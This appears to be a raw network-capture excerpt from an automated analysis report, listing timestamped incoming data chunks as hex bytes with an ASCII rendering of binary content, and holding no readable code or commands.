                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1924INData Raw: eb 68 22 6c fc 3e ec db cf 45 7c ff 60 5b d4 5f a9 bd be fe 7e dc 6e cf 3c 12 01 02 04 08 10 20 40 80 00 01 02 93 02 82 63 82 63 d9 c0 58 f4 9f 2c ac 89 3b 05 c7 04 c7 b2 81 b1 e8 2f 38 36 31 b0 dc 45 80 c0 69 05 ca 64 7e d7 75 2f 0b 9d b0 7b 13 20 3b 6d a9 d8 31 02 04 08 10 20 40 80 c0 6c 81 fe 03 09 7f 2c f4 1a 73 b7 f5 94 20 c2 ec 9d d6 91 40 83 02 25 40 53 de a3 f5 a1 9a f2 95 b1 e9 0f 0a dd 38 8e bf 87 7d ca 73 42 d9 8e 12 1c 6a 90 c9 26 ad 20 d0 07 b8 7e 2d 57 2c ef ba ee f5 c6 3a ba e5 ef c0 f7 90 63 a9 c1 7e 1c 08 35 ae 70 bc ad 92 00 01 02 04 08 10 20 40 80 c0 a4 80 e0 98 e0 58 04 c1 b2 ed 64 61 4d dc 29 38 26 38 16 41 b0 6c 2b 38 36 31 b0 dc 45 80 c0 29 05 ca 57 4d 4e 7c 9a b7 7a 62 b6 7c ea d7 a7 cb 4f 59 32 76 8a 00 01 02 04 08 10 20 f0 a1 c0
                                                                                                                                                                                                                                                                                                              Data Ascii: h"l>E|`[_~n< @ccX,;/861Eid~u/{ ;m1 @l,s @%@S8}sBj& ~-W,:c~5p @XdaM)8&8Al+861E)WMN|zb|OY2v
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1925INData Raw: 60 a1 82 b5 1a 02 04 08 10 20 40 80 80 e0 98 e0 58 04 c1 b2 6d ed e8 11 1c 13 1c 8b 20 58 b6 15 1c ab 1d 75 b9 e5 0e 1e 1c fb c3 c4 64 ee 78 af dd bb bf ca c1 21 bf 1a 67 cb e0 58 4b 57 82 28 5f 67 b4 76 5d 58 3f 01 02 04 08 10 20 40 80 c0 ba 02 e5 b5 ec b5 13 ac 67 fb 9d 13 c6 eb d6 91 b5 7f fa 74 f4 39 92 9d c7 fc 9b f7 97 b7 8f a2 3e 80 74 c8 79 95 2d ea ef 76 e1 75 d6 e0 b9 43 70 6c 9d ca b2 56 02 04 08 10 20 40 80 c0 4a 02 82 63 82 63 d9 c0 58 f4 af 2d 49 c1 31 c1 b1 6c 60 2c fa 0b 8e d5 8e ba dc 72 47 9f d8 28 57 6e ca ed b1 de 6b 0a b4 72 25 ad 9a c9 ca ad 82 63 0d 7e 95 e7 f3 9a 35 61 dd 04 08 10 20 40 80 00 01 02 eb 0b 74 5d f7 56 f3 1a f8 68 cb 08 8e ad 5f 4b f7 fe 08 47 9f 23 69 61 4c 3f 3d 3d 3d dc 7b 1d d5 ec 7f 1f 00 7e 6d e1 18 b6 bc 0d 35
                                                                                                                                                                                                                                                                                                              Data Ascii: ` @Xm Xudx!gXKW(_gv]X? @gt9>ty-vuCplV @JccX-I1l`,rG(Wnkr%c~5a @t]Vh_KG#iaL?==={~m5
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1927INData Raw: be f6 15 32 b5 13 40 7b 2e b7 55 78 aa c5 31 b7 d5 be 2f 55 73 d6 43 80 00 01 02 04 08 10 b8 77 81 c6 5e 83 bf 9c f9 78 f4 81 80 e7 cc 07 40 bc 37 3d 6e 45 b4 f8 7e 6d cf f7 c9 2b 3d f6 a9 9f 33 86 d5 2f 34 b6 6c 58 6e e8 db c2 cf 82 63 cb 1e e3 a9 e7 1d 7f 5f 5b a8 78 db 40 80 00 01 02 04 08 9c 42 40 70 4c 70 2c 82 60 d9 b6 76 00 08 8e 09 8e 45 10 2c db 0a 8e d5 8e ba dc 72 27 9b 14 7d cb ed bd de b7 0a 9c e9 72 fc 5b 85 a7 1a 3b c9 f7 fd d3 ce b7 d6 81 e5 09 10 20 40 80 00 01 02 04 b6 15 e8 ba ae 95 2b d7 9c 2e 00 52 be 4a af eb ba 2f fd eb f6 2a 67 27 b6 b7 1d 0f 4b 3e da c9 e6 48 5a be ba d5 ae 57 0f 5c b2 66 a6 d6 55 be 6a 77 2a 04 e3 be 7c e0 68 ca 7b af fb 04 c7 f2 c7 b1 b6 f6 fd 7d dd ab ca 3d 2e 01 02 04 08 10 20 70 3a 01 c1 31 c1 b1 6c 60 2c fa
                                                                                                                                                                                                                                                                                                              Data Ascii: 2@{.Ux1/UsCw^x@7=nE~m+=3/4lXnc_[x@B@pLp,`vE,r'}r[; @+.RJ/*g'K>HZW\fUjw*|h{}=. p:1l`,
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1928INData Raw: 07 c9 52 57 69 8b 75 b4 d4 1e e8 f8 af 55 57 9b ad 57 70 ac a5 ca b7 2d 04 08 10 20 40 80 c0 a1 05 04 c7 04 c7 22 08 96 6d 6b 0b 5f 70 4c 70 2c 82 60 d9 56 70 ac 76 d4 e5 96 3b f1 e4 c6 bb 60 4c ae 16 e6 f6 ee 27 9f 37 9b 14 da 60 e2 f4 fb be ec 11 1c 2b e6 fd 44 e9 96 9e c6 c6 dc 62 d7 8f 00 01 02 04 08 10 20 d0 98 c0 de ef df 8e f4 1e 4b 70 ac b1 e2 3d c8 e6 dc 38 c6 9a 08 e5 0c a9 cb 95 ce 6e bd ca d3 06 ef cb 5f 87 db 7d 94 9f f7 0e f4 ce 3c 36 e5 2b 28 37 bd ca 7a e6 f8 f5 35 5a ae 46 f6 61 88 2c b3 de ad fa 1e 60 7c 6d 39 e7 b4 ea 63 09 8e 6d 55 d5 1e 87 00 01 02 04 08 10 38 bd 80 e0 98 e0 58 36 30 16 fd 6b 07 87 e0 98 e0 58 36 30 16 fd 05 c7 6a 47 5d 6e b9 1b 27 45 57 9d 0c 98 39 f9 35 ba 0d 47 ff c4 6a ee 48 6e d7 fb ac 35 b3 e7 24 ea 86 e1 b1 37
                                                                                                                                                                                                                                                                                                              Data Ascii: RWiuUWWp- @"mk_pLp,`Vpv;`L'7`+Db Kp=8n_}<6+(7z5ZFa,`|m9cmU8X60kX60jG]n'EW95GjHn5$7
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1929INData Raw: 52 f2 42 38 16 c7 0f 4a af 64 9a 23 19 61 f5 ab d2 fa 2d ed 6f 0f 20 05 12 43 85 6e 6b 2c b6 17 da 47 55 ee eb 85 87 c7 96 3c da f7 3b cf be 06 e1 98 af 6d 39 1b 04 20 00 01 08 40 00 02 10 38 35 01 84 63 08 c7 b2 10 ac 74 5b 1b 18 08 c7 10 8e 65 21 58 e9 16 e1 58 6d d4 95 95 9b 26 45 03 25 bf 9a 27 dd ce fe 84 70 99 d5 cb f7 8e f4 04 72 2f 3f 45 38 56 ee 17 94 80 00 04 20 00 01 08 40 00 02 10 f0 23 e0 39 39 3d 1f 73 8f 38 59 2d e6 f5 a7 9f 67 70 a6 96 04 52 8e e4 e5 6a ab 38 45 7a 58 ac a5 3d 5b 1e cb f2 4a b7 db ed 6d de 3e 8a fe 47 34 d6 d2 b8 07 8e e5 29 26 1c b1 2f 3e 80 96 a2 10 80 00 04 20 00 01 08 40 00 02 3d 09 20 1c 43 38 56 2a 18 cb fb d7 fa 25 c2 31 84 63 a5 82 b1 bc 3f c2 b1 da a8 2b 2b 77 15 e1 18 4f 7c 97 f9 c5 74 ef f4 f4 71 73 31 9f 28 b9
                                                                                                                                                                                                                                                                                                              Data Ascii: RB8Jd#a-o Cnk,GU<;m9 @85ct[e!XXm&E%'pr/?E8V @#99=s8Y-gpRj8EzX=[Jm>G4)&/> @= C8V*%1c?++wO|tqs1(
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1931INData Raw: 00 02 10 80 c0 28 04 94 e3 e5 28 42 8e 12 5b 89 79 21 1c 2b 31 16 fb 86 23 e0 21 82 59 3b 47 94 f6 46 91 2f 9b 31 f9 16 ce 31 b8 a0 2f 04 66 36 5b 5d e5 be c5 7e 5f 4e ce 17 10 80 00 04 20 00 01 08 40 00 02 10 a8 25 80 70 0c e1 58 16 82 95 6e 6b 7d 0e e1 18 c2 b1 2c 04 2b dd 22 1c ab 8d ba b2 72 8a 44 58 16 e8 d8 d3 93 2d 12 27 15 c7 78 2b a3 74 bd bd 7f fc f8 f1 8f 0a ae b5 09 b2 f7 d7 87 2a 27 76 ac ae d9 2f af 67 6d 6a 0c 01 08 40 00 02 10 80 00 04 20 30 02 01 e5 78 39 8a 90 a3 c4 4e 62 5e 08 c7 4a 8c c5 be e1 08 28 72 45 39 07 11 a1 bd 51 b6 1f c6 c1 72 32 e1 9c 82 0b 5a 24 90 fd d6 63 bb 78 01 7c 09 01 08 40 00 02 10 80 00 04 20 00 81 1a 02 08 c7 10 8e 95 0a c6 f2 fe 35 fe 66 65 10 8e 21 1c 2b 15 8c e5 fd 11 8e d5 46 5d 59 39 45 32 30 0b 74 6e b7 db
                                                                                                                                                                                                                                                                                                              Data Ascii: ((B[y!+1#!Y;GF/11/f6[]~_N @%pXnk},+"rDX-'x+t*'v/gmj@ 0x9Nb^J(rE9Qr2Z$cx|@ 5fe!+F]Y9E20tn
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1932INData Raw: 0a c6 f2 fe 08 c7 6a a3 ae ac 5c 9a 7c ab 4e e8 3d 4a f6 ad fd 36 17 e8 78 0b 96 a6 d7 65 93 cf 65 c4 ce bb b7 73 82 f4 6d 2e 86 51 4e ec 98 4f cc fd f2 bc 96 a6 66 73 02 49 28 96 05 10 ae ed e1 b4 3d da f8 6c 93 f8 bf 4c 48 36 bf 7e fe 3f 4e 20 b5 3f c6 b7 a5 58 e2 cd fa 98 b9 48 f6 f8 d5 fa 1e c1 d8 4c 04 42 51 e3 c3 c4 6b cf c6 5a 39 d1 e8 6b 19 df b3 19 57 13 6a 99 4f 6f b4 55 2a 1f f9 68 23 e7 e3 0b 5f 52 63 9c 2d 0b a4 93 3d 5d 85 7f 05 fe f3 9a db 50 e2 fa ee 57 ca f1 32 c2 b1 5b 51 fb c6 04 ff dd 6f f9 34 26 01 45 ae 28 f7 11 4a 62 0f 1e 16 29 6a 03 72 5d 0a b6 5f 72 24 4a 0e 9c 7b 1f 01 84 63 fb 38 b1 17 04 20 00 01 08 40 00 02 10 80 40 40 02 08 c7 10 8e 65 21 58 e9 b6 d6 9d 11 8e 21 1c cb 42 b0 d2 2d c2 b1 da a8 2b 2b a7 48 06 2e 09 74 94 13 91
                                                                                                                                                                                                                                                                                                              Data Ascii: j\|N=J6xeesm.QNOfsI(=lLH6~?N ?XHLBQkZ9kWjOoU*h#_Rc-=]PW2[Qo4&E(Jb)jr]_r$J{c8 @@@e!X!B-++H.t
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1933INData Raw: e1 58 a9 60 2c ef 8f 70 6c 77 98 1d da 51 31 a1 f1 28 d9 21 4c 50 be 5d 31 59 97 26 8d 3d 93 a2 ab 02 3d f3 0b 55 a2 d6 ce fb c8 2f 0f 05 d9 83 c2 8a f8 4b 75 3d 9d 70 cc 7c 59 29 66 52 fa ee a3 73 3f 70 bf 43 3f 29 59 ef 8d d5 b4 6a c0 cb 23 3e 5e bf 1d 82 dd a0 70 6a 5f 11 8c dd 96 45 0c d6 16 f7 5c a1 af 81 09 9b 1f 42 bd 0a 9f 57 ec cd cf 73 26 e1 98 c5 b5 6a 1c 31 e7 1a f1 7f 63 b3 b7 bf 68 1e 60 e9 80 d8 67 b9 cd 8d e8 2f 67 bb 26 b5 ef f7 8a 29 8e eb 47 40 f5 ca 46 e5 03 7d b7 db 4d 72 df 60 af 5c f6 b3 2c 67 6a 4d c0 b3 ff b8 62 ce b2 b5 bd 38 1e 04 20 00 01 08 40 00 02 10 80 c0 84 00 c2 31 84 63 59 08 56 ba 9d b8 51 d1 47 84 63 08 c7 b2 10 ac 74 8b 70 ac 28 d4 aa 77 56 4c 68 3c 4a 64 db 6f 9e 89 97 e9 b9 ae f8 7a 00 7b 6d e4 94 41 ef cf 51 6d 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: X`,plwQ1(!LP]1Y&==U/Ku=p|Y)fRs?pC?)Yj#>^pj_E\BWs&j1ch`g/g&)G@F}Mr`\,gjMb8 @1cYVQGctp(wVLh<Jdoz{mAQmo
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1935INData Raw: 1f ce 74 de a5 b1 52 8f 31 08 c7 3c 0f 01 f5 ca bd 4a 9f 4d af f3 fe 10 73 39 b6 05 97 78 68 f1 3c 51 f2 b5 26 e6 b7 5e fe 62 63 8a af 57 c0 37 10 80 00 04 20 00 01 08 40 00 02 10 38 40 00 e1 18 c2 b1 2c 04 2b dd d6 ba 1d c2 31 84 63 59 08 56 ba 45 38 56 1b 75 65 e5 14 13 1a 7b 93 82 aa d7 05 d8 6b f0 ca 28 8e b7 b7 33 db d7 3d 84 3c 93 6e 4b c9 bd bd 7e b9 a7 2e 7b f7 51 c4 9f d5 7d b4 a4 a3 30 99 af 98 40 68 7a ce bd be 58 ba 5f 24 e1 98 72 75 84 a5 b6 64 e9 bb 52 be 7b f7 4f ab f0 f1 0a bb 9b 8f 38 a1 b7 c8 64 af dd f7 ec c7 4a 55 cb 3e 31 82 70 8c d5 35 97 6d b7 d4 b6 36 fa ae db 6b ea 55 e3 bc 46 5c 9a 8e 47 b8 26 5f bf 56 dc d7 ec e9 9b d8 27 26 01 f5 ca bd ea 7b 53 d5 98 49 5d ef 98 de 38 d6 55 39 df 13 6f ae e2 3f 16 3d ae 16 02 10 80 00 04 20 00
                                                                                                                                                                                                                                                                                                              Data Ascii: tR1<JMs9xh<Q&^bcW7 @8@,+1cYVE8Vue{k(3=<nK~.{Q}0@hzX_$rudR{O8dJU>1p5m6kUF\G&_V'&{SI]8U9o?=
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1936INData Raw: 95 ee 17 56 53 6a 3f 51 d9 cb 9a 01 84 63 f6 d4 fc 30 62 bf a3 76 40 5c 12 da d6 f6 9a 25 f7 57 0d 4d 7d 2a ad 28 d1 7c 15 89 91 62 6c ef b5 96 8e 4d a6 9c 5b 7f 4e 76 53 4d ec 0e d3 7e ee b5 6d e3 fd 9a 88 42 55 e3 bc c6 2c f0 95 81 c6 1b d9 f6 8a fb 9a d6 6d 24 c7 6b 4b 20 e5 02 e4 ab 8c 25 1f 7d 51 8f 9d 32 5d 55 3b dd 72 3c 62 2b 7d 25 01 5c 14 fb e6 7e c3 c6 a6 a7 16 91 79 fa 4f 7e 4d a8 f9 ce f4 cf 18 db 75 54 fe 4d 8f f5 fe 1a 52 fa 8f dc 3a b0 85 00 04 20 00 01 08 40 00 02 17 20 80 70 0c e1 58 a9 60 2c ef 5f 1b 1e 08 c7 10 8e 95 0a c6 f2 fe 08 c7 6a a3 ae ac 9c 67 a2 a3 36 91 ad 9c 10 b5 e4 4c 19 d1 b8 7b 7b db ba f4 55 05 08 c7 fc 84 11 e6 0b d1 3c 15 61 4c 1f fb f7 b2 b3 25 ab 73 9b ee bd f5 16 c1 b6 a8 df 11 3b 20 2e e9 13 1b 2d ec 3a 39 c6 cb
                                                                                                                                                                                                                                                                                                              Data Ascii: VSj?Qc0bv@\%WM}*(|blM[NvSM~mBU,m$kK %}Q2]U;r<b+}%\~yO~MuTMR: @ pX`,_jg6L{{U<aL%s; .-:9
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1937INData Raw: 80 00 04 20 00 01 08 3c 20 80 70 0c e1 58 16 82 95 6e 1f b8 d5 c3 9f 10 8e 21 1c cb 42 b0 d2 2d c2 b1 87 a1 d5 ec 47 c5 84 c6 91 44 f6 ed 76 93 ac d2 60 93 64 cd a0 3b 1f a8 f5 6a 1d 5b 49 aa da 84 9f 3a f1 76 c4 2f 6b 4d aa 88 3f b3 9f 9d b7 f6 9a 5b 96 f3 f6 cd 2d df dd f9 bb 4d d6 bc af a4 d3 92 c5 f4 58 e9 35 66 76 8e c3 13 43 d3 e3 b6 fc 7c 95 49 8c 9d 3e b1 39 51 50 ca 3e f9 d8 e6 71 5b 5d df c1 e3 bc 3f 59 6e fd 64 6d fb bf c4 a7 a5 58 e8 60 fd 8a ed e0 d5 9f a8 fa 90 39 4f bb 8e 96 b6 5f f2 87 e9 77 49 74 6c 6d 64 f1 98 d0 da ae e9 b1 3c 3f 8f b6 c2 a6 09 40 5b c7 b5 f1 4e e3 bd 26 7d dc dc 17 7b fe 5f 73 2f 10 25 46 7b 72 e1 d8 65 42 72 2f 5e 5e fd 90 67 1b 1a f9 5c 5e 76 1d f0 3c 6f 3d 04 e5 ad 7c 21 ad d6 56 3c ce 3b 6a 87 3d f7 e2 36 ae 1a f4
                                                                                                                                                                                                                                                                                                              Data Ascii: < pXn!B-GDv`d;j[I:v/kM?[-MX5fvC|I>9QP>q[]?YndmX`9O_wItlmd<?@[N&}{_s/%F{reBr/^^g\^v<o=|!V<;j=6
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1938INData Raw: 96 39 be b7 40 80 70 48 58 a7 9c d8 b1 e4 d5 51 bf ac b1 98 22 fe 52 5d 65 13 7f c2 f8 dd 35 69 93 5e 8d 21 9d 14 de eb 4b 89 e5 43 01 d9 de 63 95 ee 37 6a a2 dc 62 ae 67 ac 27 31 d3 97 55 73 f6 f0 4d 62 df 90 ab ed ac 4d 70 ed a9 57 ef 7d 52 5f 77 39 6e b7 db ed 61 ec 4f 26 65 76 b5 7d 25 fb 8f 20 1e 59 13 90 29 7c 59 69 ab 0d bb fe 32 4e bd 63 b4 e6 f8 69 15 8f 90 71 6d a2 cd 9a 3a b5 2a a3 1c 2f 8f 10 fb 73 ce 62 5e 08 c7 e6 06 39 e9 ff 1b 6d 6d f3 7e 38 e2 f9 ac 7f 8d da a7 2c b9 9d 8d d9 55 1c 97 c6 22 d1 ef 91 55 ac ec bc 4b bc 96 6c ea fd 9d 5d 97 92 cb 89 ce 1d 76 3c ea ed 53 9c 0f 02 10 80 00 04 20 00 01 08 b8 13 40 38 86 70 ac 54 30 96 f7 af 75 56 84 63 08 c7 4a 05 63 79 7f 84 63 b5 51 57 56 4e 21 5c 69 31 69 2f 7c ad 40 98 55 19 b6 2c ed 3d 51
                                                                                                                                                                                                                                                                                                              Data Ascii: 9@pHXQ"R]e5i^!KCc7jbg'1UsMbMpW}R_w9naO&ev}% Y)|Yi2Nciqm:*/sb^9mm~8,U"UKl]v<S @8pT0uVcJcycQWVN!\i1i/|@U,=Q
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1940INData Raw: 6d e2 3b 08 40 00 02 10 80 00 04 20 00 01 08 40 00 02 10 80 80 8c 80 22 d9 d1 52 a0 a3 5a cd a1 65 1d 5a 1b df 9b 49 ab 57 77 2a 27 76 54 93 e1 8a f8 4b 75 75 15 8e 29 13 f3 2b 89 55 92 90 07 1b 9e 80 36 9d 26 9b 87 b2 af 77 9b bd 12 13 c6 ef ad 55 7b 7e d0 bd 9a 14 4f 13 72 6f 0f ea 3b f5 99 ee 9f 5b b2 55 f5 1d a9 ff f8 bd 89 81 4e 7e 10 a5 8d e6 3e 7f a6 49 ff 68 a2 d0 9e 02 ed b5 10 51 8e 97 cd af d7 ae 2b ea f7 62 5e 08 c7 a2 3a 46 e3 eb 9a b7 bb 03 ff ff 62 63 fc 33 f5 1b 6b a6 56 f6 d3 d6 2e 29 cf 3f b0 7f 7e 1a af ab fd d4 ee 9d ce c2 32 70 3d 86 ba af 5f 6b 6f f8 1e 02 10 80 00 04 20 00 01 08 40 00 02 10 80 00 04 20 30 04 01 45 c2 ca 12 65 ad e0 08 c5 0b 21 13 18 de ab b0 b5 9c 40 52 4e ec 58 a2 ac a5 5f ee f5 6f 45 fc a5 ba ba 4e fc 05 12 c6 58
                                                                                                                                                                                                                                                                                                              Data Ascii: m;@ @"RZeZIWw*'vTKuu)+U6&wU{~Oro;[UN~>IhQ+b^:Fbc3kV.)?~2p=_ko @ 0Ee!@RNX_oENX
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1941INData Raw: 53 e5 29 8e d8 a5 c5 18 7b 6f 33 a3 ec 5b 8e 30 3a 43 59 ef 95 5e f7 fa 04 fb 41 00 02 10 80 00 04 20 00 01 08 40 00 02 10 80 00 04 86 27 a0 48 08 d5 24 b1 b6 40 0b 27 e1 df b6 ae cd e3 77 6f 3b f6 98 94 54 27 df 7a f8 e5 96 ed bd ed 96 13 85 76 de ad 6b 3b fa bb ad 48 97 cf a7 dc f6 f0 d5 a3 6c ce 50 3e 92 70 cc 73 92 a0 95 ed 22 88 98 3c da 81 56 bc 5a 1d 27 82 98 d5 26 f3 8e d6 27 42 fc 8d 18 77 47 b9 6f 95 57 8f 63 52 5f 7b 99 d5 c6 b2 3d 54 63 a9 d9 d8 c6 6d 65 53 a5 9f 8d d8 6f 88 79 21 1c cb 81 7a f2 ed ac 3d 40 3c 76 fb eb b5 ae 26 f0 88 3a 5e 38 91 cd 4c 2c f6 ab f5 6a f0 16 b2 96 63 b3 7b 16 b3 e3 08 bc 3c fb a8 28 af 26 1f c1 2e 9d ae d1 4d b0 7f f2 ee 8b ea 41 00 02 10 80 00 04 20 00 01 08 40 00 02 10 80 00 04 ee 04 14 93 2d bd 04 3a aa 15 38
                                                                                                                                                                                                                                                                                                              Data Ascii: S){o3[0:CY^A @'H$@'wo;T'zvk;HlP>ps"<VZ'&'BwGoWcR_{=TcmeSoy!z=@<v&:^8L,jc{<(&.MA @-:8
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1942INData Raw: fe 3f ff fa bf fc c1 a0 d4 07 fe eb df 49 b4 d6 06 5e 41 39 c5 c4 63 6f 81 8e 30 71 e5 2a 62 10 bc aa ea ad e7 84 b0 3a 81 db db 2f 97 c2 52 11 7f 96 ac ee 3d f1 a7 7a 65 ec 24 11 cf 53 c6 4b 0e d7 f0 bb 00 22 09 7b dd df 6f 0d ab e4 76 28 75 7c b4 10 2d b9 c1 ea 74 a2 00 36 38 fc ba e0 08 31 38 69 73 a7 13 3b af 3d 45 e6 9d 5c e2 f0 61 55 fd f9 c4 06 97 5f 71 21 c0 84 a7 cb 43 24 ca f1 72 ef f1 e3 e1 40 5c 38 80 98 17 f9 8c 05 9b 9c f1 ab 49 5b 3c ed 0f f9 bc fd 1a c3 37 d1 3d b8 74 a5 f3 02 7f 91 ae cc 56 12 ab c2 1c dc 5a 9c b9 e6 e6 4a 58 45 de d7 44 58 e9 1e 23 e4 6b 48 57 62 e7 f2 63 e0 c8 3e c5 b5 41 00 02 10 80 00 04 20 10 9c 00 c2 31 04 63 a5 82 b1 bc 7f ad 6b 23 1c 43 34 57 2d 1a 44 38 56 1b 76 45 e5 14 13 5d bd 93 83 aa 09 02 af 95 06 b2 81 05
                                                                                                                                                                                                                                                                                                              Data Ascii: ?I^A9co0q*b:/R=ze$SK"{ov(u|-t6818is;=E\aU_q!C$r@\8I[<7=tVZJXEDX#kHWbc>A 1ck#C4W-D8VvE]
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1944INData Raw: 9a f8 4b 2b fd ed f1 a9 5e fb 90 1c 9e 3a 58 c7 cf 62 e1 98 cb ca 8e 3d f0 a9 27 ed 3c 56 71 e8 c1 ad c7 31 d5 4f cc b7 5a 99 28 f0 e4 4d 49 3b ff 6a e2 a7 de 13 c5 3d fc c8 8e a9 ea cb f3 64 99 62 fc d2 8b e5 d1 e3 8a fb a6 6e e3 ab 29 17 e5 78 b9 d7 f8 71 5a bf d6 9f c5 bc 10 8e b5 36 28 c7 3b 44 c0 c6 0c ea 3e 2b f7 5d 1b db ae 22 5c 61 9e e8 d1 d8 c8 56 5b fb ed 90 81 03 15 4e af ac 7c 54 5f 97 df ce c4 34 90 79 f3 6a 9e d1 c4 a8 6f 91 18 71 2d 10 80 00 04 20 00 01 08 40 60 08 02 08 c7 10 8e 95 0a c6 f2 fe b5 0e 8e 70 0c e1 18 c2 b1 da e8 f1 29 a7 48 1c 7a 4e 70 dd 6e b7 97 8d a4 64 8f 84 55 b7 a4 9f 22 01 e7 65 2f e5 c4 8e f9 88 57 3d a7 91 ad 88 bf 54 d7 7f 4e af a3 d5 67 b5 0d 79 5d 57 2b 4b 6e 1f 47 39 39 3f e2 c4 75 26 2a e8 8f 3e f5 71 f9 3a d8
                                                                                                                                                                                                                                                                                                              Data Ascii: K+^:Xb='<Vq1OZ(MI;j=dbn)xqZ6(;D>+]"\aV[N|T_4yjoq- @`p)HzNpndU"e/W=TNgy]W+KnG99?u&*>q:
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1945INData Raw: c6 8f 4d 01 cd 0e 26 e6 45 7c ce ec c1 bf 63 10 88 26 44 ef b1 ea 98 5a 64 ec d5 67 44 f0 38 f5 6a 54 11 c6 8b 11 ec d0 fb 1a a2 bc b2 12 d1 76 6f 4b 73 7c 08 40 00 02 10 80 00 04 4e 45 00 e1 18 c2 b1 52 c1 58 de bf 36 10 10 8e 21 1c 43 38 56 1b 3d 3e e5 14 93 2b 8a c4 8d 2a f9 d9 6a 65 1c c1 2b 00 dd 45 38 ca 89 1d 4b dc 2a fc 52 11 7f a9 ae 5d 84 63 ca 04 fc 88 93 99 3e ad 7c 9f b3 28 45 50 8a 58 6d 41 51 c9 4c d5 c6 b5 e0 d6 f3 18 79 d2 4e b5 ed 55 b7 db ed f6 a2 aa 93 f7 79 ad ed ef 31 a1 bc d7 36 01 e2 1a 61 ca cc 58 aa b1 55 f6 fd de 7d 94 72 bc 3c e2 58 4b cc 8b f8 9c c5 27 ff 8e 43 40 95 3f c9 6d e9 6c db 7c d5 31 75 5f 91 ea d7 ec 41 c3 c8 9e 15 40 50 f4 2d 32 9f 33 5d db ed 76 7b 9d c5 6e af 07 48 56 8f 6b 42 c5 33 31 a5 2e 10 80 00 04 20 00 01
                                                                                                                                                                                                                                                                                                              Data Ascii: M&E|c&DZdgD8jTvoKs|@NERX6!C8V=>+*je+E8K*R]c>|(EPXmAQLyNUy16aXU}r<XK'C@?ml|1u_A@P-23]v{nHVkB31.
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1946INData Raw: be 64 9f b8 c8 d6 c4 63 7f eb c5 5a d9 16 a6 fe 7c c8 f6 b0 97 3d ec b8 ea b8 ee dd d6 2a c7 5b c6 b6 a7 ed 7a 1c 5b cc 8b b1 69 0f a3 72 4c 09 81 08 ab 08 99 78 ad 55 e5 95 6d 43 ea bf 87 6b 4f 8f b0 17 f3 be 94 48 ef 88 9d 5a 95 55 ae 30 97 e2 8b fe b7 95 31 39 0e 04 20 00 01 08 40 00 02 e7 26 80 70 0c e1 58 16 82 95 6e 6b 23 03 e1 18 c2 31 84 63 b5 d1 e3 53 4e 31 b9 62 49 23 9f da 2d 9f 45 35 c9 57 ba ea 85 62 75 90 9e 93 ab cb d6 b8 7f 2b 4e 26 4a 5e f7 a4 88 bf 5e 89 ea 00 f6 23 39 78 0f a7 ee 9f 54 ed e8 c8 42 09 55 bc 1b b3 91 b9 f5 74 66 b5 4d 7a d6 6d ed d8 49 94 fe 2b fb c5 45 b6 6f 26 9a 5b 63 72 e4 7b 65 5b 48 5c 2f 5b 4e 1d d7 bd ef 73 94 e3 2d 63 bb 4c 3d ee b7 62 5e 8c 4d e3 ba 06 57 56 41 20 c0 aa 63 cd 56 47 57 b6 0d 69 ec d5 4c 04 57 61
                                                                                                                                                                                                                                                                                                              Data Ascii: dcZ|=*[z[irLxUmCkOHZU019 @&pXnk#1cSN1bI#-E5Wbu+N&J^^#9xTBUtfMzmI+Eo&[cr{e[H\/[Ns-cL=b^MWVA cVGWiLWa
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1948INData Raw: aa f5 5c e5 c4 4e 4a 2e b1 e2 58 ad f1 52 39 65 32 d8 ce 7d f0 f2 29 5e 40 40 3c d1 e2 1e ab 05 68 56 77 55 32 4b 6d dc e5 26 a8 56 8d f1 f4 f4 a4 ee 73 a2 f4 bd 8f 18 9d 59 40 d6 6a 42 49 f5 ea f3 dc df b6 aa c7 23 3f 18 ed b7 cc 46 b1 f5 b0 87 b2 ed f2 a8 5f 6b 7f 13 f3 a2 df 6d 6d 50 8e 17 82 80 a2 7d cd e7 6c d9 0e 29 fb 70 84 63 b7 55 91 57 b6 75 cb 6d 88 c0 b9 d8 45 58 ac b6 b4 61 c9 b1 5a b6 13 17 33 1b d5 85 00 04 20 00 01 08 40 e0 6a 04 10 8e 21 1c 2b 15 8c e5 fd 6b 63 05 e1 18 c2 31 84 63 b5 d1 e3 53 4e 71 33 6f 09 7c 9f da 6d 9f c5 26 6e 4b 12 10 2d f6 7d 94 c4 10 4d 6e 7c db 26 d5 7f 0f 51 dd 3f 12 96 0a bf 54 c4 9f f9 f0 23 1f 3c 62 e9 16 f1 71 e4 18 7f fc f1 c7 bf 1d b9 7e ca ee 27 a0 14 41 29 62 75 3f 99 f5 3d 95 cc 2c ae 46 10 2a ad d3 6b
                                                                                                                                                                                                                                                                                                              Data Ascii: \NJ.XR9e2})^@@<hVwU2Km&VsY@jBI#?F_kmmP}l)pcUWumEXaZ3 @j!+kc1cSNq3o|m&nK-}Mn|&Q?T#<bq~'A)bu?=,F*k
